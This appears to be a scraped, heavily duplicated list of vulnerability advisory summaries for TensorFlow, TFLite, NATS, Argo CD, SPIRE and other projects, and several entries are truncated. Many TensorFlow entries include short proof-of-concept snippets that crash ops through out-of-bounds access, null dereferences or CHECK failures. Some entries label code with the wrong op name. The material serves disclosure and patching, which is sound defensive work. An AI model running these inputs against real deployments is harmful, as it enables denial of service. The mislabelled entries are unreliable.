An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)
The implementation of TrySimplify has undefined behavior due to dereferencing a null pointer in corner cases that result in optimizing a node with no inputs.
The implementation of TrySimplify has undefined behavior due to dereferencing a null pointer in corner cases that result in optimizing a node with no inputs.
The implementation of TrySimplify has undefined behavior due to dereferencing a null pointer in corner cases that result in optimizing a node with no inputs.
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)
Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)
An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)
An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)
The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)
The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)
The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)
The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes. import tensorflow as tf tf.io.decode_raw(tf.constant(["1","2","3","4"]), tf.uint16, fixed_length=4)
The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes. import tensorflow as tf tf.io.decode_raw(tf.constant(["1","2","3","4"]), tf.uint16, fixed_length=4)
The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes. import tensorflow as tf tf.io.decode_raw(tf.constant(["1","2","3","4"]), tf.uint16, fixed_length=4)
The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …
The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …
The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …
The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …
The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …
The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …
A privilege escalation vulnerability impacting the Google Exposure Notification Verification Server (versions prior to 0.23.1), allows an attacker who (1) has UserWrite permissions and (2) is using a carefully crafted request or malicious proxy, to create another user with higher privileges than their own. This occurs due to insufficient checks on the allowed set of permissions. The new user creation event would be captured in the Event Log.
TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices. This is because the implementation does a double redirection to access an element of an array allocated on the heap. If the value at indices + 1 is outside the bounds of csr_row_ptr, this results in writing outside of bounds of …
Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …
Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …
Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …
Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)
Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)
Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)
Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)
Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)
Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)
Lotus is an Implementation of the Filecoin protocol written in Go. BLS signature validation in lotus uses blst library method VerifyCompressed. This method accepts signatures in 2 forms: "serialized", and "compressed", meaning that BLS signatures can be provided as either of 2 unique byte arrays. Lotus block validation functions perform a uniqueness check on provided blocks. Two blocks are considered distinct if the CIDs of their blockheader do not match. …
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in github.com/cilium/cilium.
The package github.com/argoproj/argo-cd/cmd before 1.7.13, from 1.8.0 and before 1.8.6 are vulnerable to Cross-site Scripting (XSS) the SSO provider connected to Argo CD would have to send back a malicious error message containing JavaScript to the user.
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
Syncthing is a continuous file synchronization program. In Syncthing before version 1.15.0, the relay server strelaysrv can be caused to crash and exit by sending a relay message with a negative length field. Similarly, Syncthing itself can crash for the same reason if given a malformed message from a malicious relay server when attempting to join the relay. Relay joins are essentially random (from a subset of low latency relays) …
When reading a file, libwebp allocates an excessive amount of memory. The highest threat from this vulnerability is to the service availability.
TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad. This is because the implementation does not validate the rank of the input_* tensors. In turn, this results in the tensors being passes as they are to QuantizeAndDequantizePerChannelGradientImpl. However, the vec<T> method, requires the rank to 1 and triggers a CHECK failure otherwise. The fix will be …
In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …
In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …
Impact If your installation is using the export-importer service, there is potential impact. If your installation is not importing keys via the export-importer services, your installation is not impacted. In versions 0.19.1 and earlier, the export-importer service assumed that the server it was importing from had properly embargoed keys for at least 2 hours after their expiry time. There are now known instances of servers that did not properly embargo …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-28466.txt) Problem Description An export/import cycle between accounts could crash the nats-server, after consuming CPU and memory. This issue was fixed publicly in https://github.com/nats-io/nats-server/pull/1731 in November 2020. The need to call this out as a security issue was highlighted by snyk.io and we are grateful for their assistance in doing so. Organizations which run a NATS service providing access to accounts run by untrusted third parties …
Impact When Argo CD was connected to a Helm OCI repository with authentication enabled, the credentials used for accessing the remote repository were logged. Anyone with access to the pod logs - either via access with appropriate permissions to the Kubernetes control plane or a third party log management system where the logs from Argo CD were aggregated - could have potentially obtained the credentials to the Helm OCI repository. …
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)
An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to tf.raw_ops.RaggedCross
An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to tf.raw_ops.RaggedCross
An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to tf.raw_ops.RaggedCross
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …
An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …
An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …
A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …
